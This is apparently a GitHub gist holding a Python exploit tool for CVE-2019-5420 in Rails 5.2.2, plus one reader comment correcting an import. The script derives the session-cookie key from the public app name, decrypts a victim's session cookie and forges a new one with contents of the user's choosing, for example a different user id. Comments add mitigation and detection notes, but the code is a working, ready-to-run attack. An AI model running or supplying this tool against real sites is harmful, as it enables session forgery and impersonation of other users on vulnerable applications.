@adenkiewicz
Last active March 29, 2020 23:14
#!/usr/bin/env python3
#
# This is a simple decrypt-tamper-encrypt tool for CVE-2019-5420 affecting ruby
# If you're lucky, session cookie will contain user id or other data to play with
# Look for cookies with two "--" substrings inside
import urllib.parse
import hashlib
import base64
from Cryptodome.Cipher import AES
import sys
# Defensive context: every byte of the "secret" below is derived from the
# application class name, a public value. A deployment whose key is derivable
# this way has effectively unauthenticated session cookies: anyone who knows
# the app name can read them and re-seal altered contents. Mitigation is a
# patched Rails release plus a random, per-deployment secret_key_base, followed
# by a secret rotation so cookies sealed under the derived key stop validating.
# On the detection side, session contents (e.g. a user id) that change without
# a matching login are the signal to look for.


def derive_cookie_key(app_name: str) -> bytes:
    """Return the 32-byte AES key this script uses for the session cookie.

    Mirrors the derivation in the referenced Rails 5.2.2 source: the MD5 hex
    digest of the application class name is stretched with PBKDF2-HMAC-SHA1
    (1000 iterations) under a fixed salt.
    """
    salt = b"authenticated encrypted cookie"
    name_digest = hashlib.md5(app_name.encode()).hexdigest().encode()
    return hashlib.pbkdf2_hmac('sha1', name_digest, salt, 1000, dklen=32)


app_name = input("Provide App name: ")
if "::Application" not in app_name:
    app_name += "::Application"
# https://github.com/rails/rails/blob/v5.2.2/actionpack/lib/action_dispatch/railtie.rb#L22
key = derive_cookie_key(app_name)

raw_cookie = urllib.parse.unquote(input("Provide session cookie value: "))
# https://github.com/rails/rails/blob/v5.2.2/activesupport/lib/active_support/message_encryptor.rb#L185
# Cookie layout: base64(ciphertext) -- base64(iv) -- base64(GCM tag). Anything other
# than exactly three "--"-separated parts raises ValueError here, which is not caught.
ciphertext, nonce, tag = map(base64.b64decode, raw_cookie.split("--"))

decryptor = AES.new(key, AES.MODE_GCM, nonce)
plaintext = decryptor.decrypt(ciphertext)
try:
    decryptor.verify(tag)
    print("Here's your decoded cookie:")
    # UnicodeDecodeError is a ValueError subclass, so a non-UTF-8 payload also
    # ends up in the "Decode failed" branch below.
    print(plaintext.decode())
except ValueError:
    # Tag mismatch: wrong app name, a different key derivation on the server,
    # or a cookie that was never sealed with this key.
    print("Decode failed")
    sys.exit(-1)

# A GCM cipher object cannot be reused after verify(), so build a second one.
# Note that the cookie's own nonce is reused for the new ciphertext; GCM's
# guarantees rest on nonce uniqueness per key, which is one more reason the
# server side must never let a key like this exist.
encryptor = AES.new(key, AES.MODE_GCM, nonce)
replacement = input("\nProvide forged session cookie: ")
new_ciphertext, new_tag = encryptor.encrypt_and_digest(replacement.encode())
encoded_parts = [base64.b64encode(part).decode() for part in (new_ciphertext, nonce, new_tag)]
forged_cookie = urllib.parse.quote("--".join(encoded_parts))
print("Here's your forged cookie:")
print(forged_cookie)

arthusu commented Mar 29, 2020

replace line 10 `from Cryptodome.Cipher import AES` with `from Crypto.Cipher import AES`
